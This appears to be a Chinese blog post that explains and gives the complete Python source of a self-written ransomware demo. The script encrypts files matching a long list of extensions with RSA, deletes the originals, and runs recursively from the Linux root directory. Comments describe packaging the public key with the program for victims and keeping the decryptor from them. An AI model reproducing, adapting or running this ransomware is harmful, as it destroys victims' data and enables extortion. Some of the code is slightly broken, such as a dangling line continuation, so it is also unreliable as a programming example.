简单来说,勒索病毒就是通过加密受害者电脑的本地数据,向受害者勒索赎金的恶意软件。加密勒索软件的核心是​加密算法​,我自己实现的勒索病毒使用的就是安全度高破解难度大的RSA加密算法。RSA是一种非对称公钥加密算法,依赖于大质数分解难题,通过公钥无法轻易破解私钥。此demo的核心思想就是在攻击者本地生成RSA公私钥,并把私钥保存起来,使用公钥加密受害者电脑上的数据。废话不多说,直接上代码。

import base64
import os.path

import rsa

#生产1024位公私钥并保存为.pem  先在本地生成,将生成的公钥和加密程序一起打包发送到受害者即可
# pub, priv = rsa.newkeys(1024)
#
# pub = pub.save_pkcs1()
# with open(f"./keys/pubkey.pem", mode="wb") as file:
#     file.write(pub)
#
# priv = priv.save_pkcs1()
# with open(f"./keys/privkey.pem", mode="wb") as file:
#     file.write(priv)


#预定义想要加密的文件后缀名,可以自己选择
target_list_str = ".txt  .exe  .php  .pl  .7z  .rar  .m4a  .wma  .avi  .wmv  .csv  .d3dbsp  .sc2save  .sie  .sum  " \
                  ".ibank  .t13  .t12  .qdf  .gdb  .tax  .pkpass  .bc6  .bc7  .bkp  .qic  .bkf  .sidn  .sidd  .mddata " \
                  " .itl  .itdb  .icxs  .hvpl  .hplg  .hkdb  .mdbackup  .syncdb  .gho  .cas  .svg  .map  .wmo  .itm  " \
                  ".sb  .fos  .mcgame  .vdf  .ztmp  .sis  .sid  .ncf  .menu  .layout  .dmp  .blob  .esm  .vtf  " \
                  ".dazip  .fpk  .mlx  .kf  .iwd  .vpk  .tor  .psk  .rim  .w3x  .fsh  .ntl  .arch00  .lvl  .snx  .cfr " \
                  " .ff  .vpp_pc  .lrf  .m2  .mcmeta  .vfs0  .mpqge  .kdb  .db0  .mp3  .upx  .rofl  .hkx  .bar  .upk  " \
                  ".das  .iwi  .litemod  .asset  .forge  .ltx  .bsa  .apk  .re4  .sav  .lbf  .slm  .bik  .epk  " \
                  ".rgss3a  .pak  .big  .unity3d  .wotreplay  .xxx  .desc  .py  .m3u  .flv  .js  .css  .rb  .png  " \
                  ".jpeg  .p7c  .p7b  .p12  .pfx  .pem  .crt  .cer  .der  .x3f  .srw  .pef  .ptx  .r3d  .rw2  .rwl  " \
                  ".raw  .raf  .orf  .nrw  .mrwref  .mef  .erf  .kdc  .dcr  .cr2  .crw  .bay  .sr2  .srf  .arw  .3fr  " \
                  ".dng  .jpeg  .jpg  .cdr  .indd  .ai  .eps  .pdf  .pdd  .psd  .dbfv  .mdf  .wb2  .rtf  .wpd  .dxg  " \
                  ".xf  .dwg  .pst  .accdb  .mdb  .pptm  .pptx  .ppt  .xlk  .xlsb  .xlsm  .xlsx  .xls  .wps  .docm  " \
                  ".docx  .doc  .odb  .odc  .odm  .odp  .ods  .odt  .sql  .zip  .tar  .tar.gz  .tgz  .biz  .ocx  " \
                  ".html  .htm  .3gp  .srt  .cpp  .mid  .mkv  .mov  .asf  .mpeg  .vob  .mpg  .fla  .swf  .wav  .qcow2 " \
                  " .vdi  .vmdk  .vmx  .gpg  .aes  .ARC  .PAQ  .tar.bz2  .tbk  .bak  .djv  .djvu  .bmp  .cgm  .tif  " \
                  ".tiff  .NEF  .cmd  .class  .jar  .java  .asp  .brd  .sch  .dch  .dip  .vbs  .asm  .pas  .ldf  .ibd " \
                  " .MYI  .MYD  .frm  .dbf  .SQLITEDB  .SQLITE3  .asc  .lay6  .lay  .ms11  .sldm  " \
                  ".sldx  .ppsm  .ppsx  .ppam  .docb  .mml  .sxm  .otg  .slk  .xlw  .xlt  .xlm  .xlc  .dif  .stc  " \
                  ".sxc  .ots  .ods  .hwp  .dotm  .dotx .docm  .DOT  .max  .xml  .uot  .stw  .sxw  .ott  .csr  .key  " \


# 加密过程
def rsa_encrypt(filename):

    if filename.split(".")[-1] in target_list:
        with open("./pubkey.pem") as file:  #加载RSA公钥,准备加密
            pub = file.read()
            pub = rsa.PublicKey.load_pkcs1(pub)
        with open(filename, mode='rb') as file:
            data = file.read()

        # 删除原始文件
        os.remove(filename)
        res = []
        for i in range(0, len(data), 117):
            res.append(rsa.encrypt(data[i:i + 117], pub))
        byte_data = b''.join(res)
        byte_data = base64.b64encode(byte_data).decode()

        filename = filename + ".enc" #加密后的文件后缀名改为.enc
        with open(filename, mode='w') as file:
            file.write(byte_data)


def encrypt(file_path):
    if os.path.isdir(file_path):
        file_names = os.listdir(file_path)
        for file_name in file_names:
            file_name = os.path.join(file_path, file_name)
            if os.path.isdir(file_name):
                encrypt(file_name)
            else:
                rsa_encrypt(file_name)
    else:
        rsa_encrypt(file_path)


# 解密过程,当然如果当为攻击程序肯定不能发送到被害者服务器,此处是为了防止误操作将自己文件加密后的还原(或者确保受害者无法浏览到此代码也可一起发送)

def rsa_decrypt(file_name):
    if file_name.split(".")[-2] in target_list:
        with open("./privkey.pem", mode="rb") as file:
            priv = file.read()
            priv = rsa.PrivateKey.load_pkcs1(priv)
        with open(file_name, mode='r') as file:
            data = file.read()

        data = base64.b64decode(data.encode())

        res = []

        for i in range(0, len(data), 128):
            temp_plaintext = rsa.decrypt(data[i:i + 128], priv)
            res.append(temp_plaintext)

        last = b''.join(res)

        #删除加密文件
        os.remove(file_name)

        with open(file_name.replace(".enc", ""), mode='wb') as file:
            file.write(last)


def decrypt(file_path):
    if os.path.isdir(file_path):
        file_names = os.listdir(file_path)
        for file_name in file_names:
            file_name = os.path.join(file_path, file_name)
            if os.path.isdir(file_name):
                decrypt(file_name)
            else:
                rsa_decrypt(file_name)
    else:
        rsa_decrypt(file_path)


if __name__ == "__main__":
    target_list = []
    for i in target_list_str.split("."):
        target_list.append(i.strip())

    encrypt("/") #此处自定义想要加密的目录名称,我这里写成了linux下的根目录
    #decrypt("/")#解密加密后的文件

3 comments

  • 1